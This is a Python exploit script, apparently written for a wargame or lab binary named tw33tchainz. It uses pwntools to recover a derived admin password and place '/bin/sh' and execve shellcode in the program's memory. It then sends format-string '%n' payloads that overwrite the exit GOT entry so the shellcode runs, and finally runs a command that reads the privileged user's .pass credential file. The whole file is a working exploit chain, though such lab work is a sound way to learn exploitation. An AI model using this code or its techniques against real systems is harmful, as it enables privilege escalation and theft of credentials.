import structimport sysimport subprocessimport binasciiimport arrayimport m

1. import struct
2. import sys
3. import subprocess
4. import binascii
5. import array
6. import math
7. import itertools
8.  
9.  
10. from itertools import dropwhile
11. from pwnlib.asm import asm, disasm, context, make_elf
12.  
13. # toolz was not installed so these functions were copied over
14. def first(seq):
15. """ The first element in a sequence
16.  
17. >>> first('ABC')
18. 'A'
19. """
20. return next(iter(seq))
21.  
22. def second(seq):
23. """ The second element in a sequence
24.  
25. >>> second('ABC')
26. 'B'
27. """
28. return next(itertools.islice(seq, 1, None))
29.  
30.  
31. context.clear()
32. context.arch = 'i386'
33. context.bits = 32
34.  
35. username = map(ord, 'cccc000acccccccccccccccccccccccc'.decode('hex'))
36. salt = map(ord, 'baba000ababababababababababababa'.decode('hex'))
37.  
38.  
39. p = subprocess.Popen(['/levels/project1/tw33tchainz'],
40. stdout=subprocess.PIPE,
41. stdin=subprocess.PIPE)
42.  
43.  
44. p.stdin.write('\n'.join([
45. '\n',
46. '\n'
47. ]).ljust(4096, '\n'))
48.  
49.  
50. # skip noise
51. first(dropwhile(lambda line: 'Generated' not in line,
52. iter(p.stdout.readline, '')))
53.  
54. generated = p.stdout.readline()
55. generated = map(ord, generated.strip().decode('hex'))
56.  
57. secret_pass = ''
58. for i in range(16):
59. secret_pass += ("%.2x" % (((username[i] ^ generated[i]) - salt[i] + 2**32) & 0xff))
60.  
61.  
62. s = struct.pack('<I', int(secret_pass[:8], 16)) + \
63. struct.pack('<I', int(secret_pass[8:16], 16)) + \
64. struct.pack('<I', int(secret_pass[16:24], 16)) + \
65. struct.pack('<I', int(secret_pass[24:], 16))
66.  
67.  
68.  
69. p.stdin.write('\n'.join([
70.  
71. '3',
72. s,
73. '\n',
74.  
75. '6',
76. '\n',
77. '\n',
78.  
79. '1',
80. "/bin/sh\x00",
81. "\n",
82.  
83. "2",
84. "\n",
85.  
86. ]).ljust(4096, '\n'))
87.  
88. output = dropwhile(lambda line: 'Address' not in line,
89. iter(p.stdout.readline, ''))
90.  
91. address = first(output)[-11:].strip()
92.  
93.  
94. instructions = [
95. "xor eax, eax",
96. "mov ebx, %s" % address,
97. "xor ecx, ecx",
98. "xor edx, edx",
99. "mov al, 0xb",
100. "int 0x80"
101. ]
102.  
103.  
104. shellcode = ''
105. for instr in instructions:
106. shellcode += asm(instr)
107.  
108.  
109. p.stdin.write('\n'.join([
110. "1",
111. shellcode,
112. "\n",
113.  
114. "2",
115. "\n",
116. ]).ljust(4096, '\n'))
117.  
118. output = dropwhile(lambda line: 'Address' not in line,
119. iter(p.stdout.readline, ''))
120.  
121. shellcode_address = int(second(output)[-11:].strip(), 16)
122.  
123.  
124. # exit@plt
125. base_addr = 0x804d03c
126.  
127. first_addr = struct.pack('<I', base_addr)
128. second_addr = struct.pack('<I', base_addr+1)
129. third_addr = struct.pack('<I', base_addr+2)
130.  
131. offset = 8
132.  
133. lob = (shellcode_address & 0xff) - 0x5
134. first_input = "A" + first_addr + "%%%dx" % lob + "%%%i$n" % offset
135.  
136. lob = ((shellcode_address & 0xff00) >> 8) - 0x5
137. second_input = "A" + second_addr + "%%%dx" % lob + "%%%i$n" % offset
138.  
139.  
140. lob = ((shellcode_address & 0xffff0000) >> 16) - 0x5
141. third_input = "A" + third_addr + "%%%dx" % lob + "%%%i$n" % offset
142.  
143. p.stdin.write('\n'.join([
144.  
145. "1",
146. first_input,
147. "\n",
148.  
149. "1",
150. second_input,
151. "\n",
152.  
153. "1",
154. third_input,
155. "\n",
156.  
157. "5",
158. "\n"
159.  
160.  
161. ]).ljust(4096, '\n'))
162.  
163.  
164. p.stdin.write('cat /home/project1_priv/.pass\n')
165. print p.communicate()[0]